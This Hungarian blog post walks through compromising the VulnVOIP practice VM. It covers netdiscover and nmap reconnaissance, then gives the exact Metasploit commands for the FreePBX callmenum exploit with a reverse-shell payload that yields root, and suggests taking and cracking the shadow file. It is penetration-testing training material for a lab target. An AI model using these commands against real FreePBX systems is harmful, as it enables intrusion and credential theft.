2013. december 7., szombat

VulnVOIP sebezhető rendszer megfejtése.

Szóval mi ez a VulnVOIP?
Ez egy sebezhető linux alapú rendszer, amin tudjuk gyakorolni a web pentest módszereket. :)
Direkt erre van kitalálva, itt lehet letölteni: http://vulnhub.com/entry/hacklab_vulnvoip,40/
A csomagban egy VMDK-t és egy VMX fájlt fogsz találni amit be kell importálni. A VMDK fájlt a VirtualBox használja, a VMX-et a Vmware player meg minden Vmware termék ami virtualizációra alkalmas alkalmazás. Szóval ha beimportáltuk a fájlt akkor a hálózati kártyát Virtualbox esetén Bridgelt kártyára kell állítan, és aztán a haladóra kattintva a kártya típus állítsuk át Pcnet-Fast III-re. Mentsd el aztán lehet kezdeni. Indítsuk el a virtuális gépet és várjuk meg míg elindul aztán kérni fog egy jelszót ne kérdezzétek nem tudom a jelszót én sem. :D


Szóval most jön az, hogy vajon, hogy fogom megnézni az ip címet? stb stb
Csak megsúgom, hogy a Netdiscover meg tudja keresni az ip címet szóval akkor kezdjük el megkeresni az ip címet csinálhatjuk úgy is,hogy csak simán beírod a parancssorba,hogy netdiscover vagy pl netdiscover -r 192.168.55.0/24 és a 192.168.55.0-tól kezdi el keresni a ip címeket a lokális hálón.

Na most,hogy megvan az ip cím kezdhetünk portscannelni. Ahogy tanultuk a portscan-es cikkben.
Írjuk be hogy: nmap ip cím
És kijönnek hogy milyen portok vannak nyitva ha jobban megfigyeljük,és megnézzük az ip címet a böngészőben akkor lehet látni,hogy van egy Freepbx webszolgáltatás a szerveren ebben a webszolgáltatásban elég sok a hiba és ezen keresztül akár be is juthatunk a rendszerben.
Mit csinál ilyenkor az ember?
Hát ír egy exploitot vagy fogja a metasploitot és megpróbálja exploitálni a hibás webalkalmazást. Ez az exploit a(z) unix/http/freepbx_callmenum, és payloadot is be kell állítani. Ha már betöltöttük az exploitot akkor ha beírjuk, hogy show payloads ki fogja írni a payloadokat amik szerinte jók, ezzel az exploittal én a(z) generic/shell_reverse_tcp payloadot fogom használni ami egy rendszer shellt nyit nekünk méghozzá root joggal ez elég jó választás. Akkor lássunk is neki beállítani az exploitot:
use unix/http/freepbx_callmenum
Aztán a payloadot:
set payload generic/shell_reverse_tcp
Most be kell állítani az rhostot és az lhostot lhost(localhost) rhost(remotehost)
set lhost saját ip címed
set rhost áldozat ip címe
Ezután be kell állítani a bufferek számát, hogy hánytól próbálkozzon és meddig pl 1-1000. Ezt át kell állítani ha nem akarsz sokat várni: :)
set extension 2000-2000
Sőt még a localportot is be tudjuk állítani,hogy hanyas porton nyisson vissza hozzánk a célpont gép.
set lport portszám
Nem ajánlott 80-as portot használni ha már fut a gépeden webszerver nem fog tudni visszacsatlakozni az exploit, mert az a port már foglalt lesz. (Nem fog sokat próbálkozni csak egyszer megpróbálja.)
Ha ez is megvan akkor írjuk be,hogy exploit.
És már bent is vagyunk ha minden jól megy :

Nyugodtan be lehet írni, hogy id vagy whoami. root jogot adott az exploit innen már akár a shadow-t is meg lehet szerezni, és aztán visszafejteni és használni a root felhasználót.
UPDATE:videó!
Ennyi lenne remélem érthető volt :)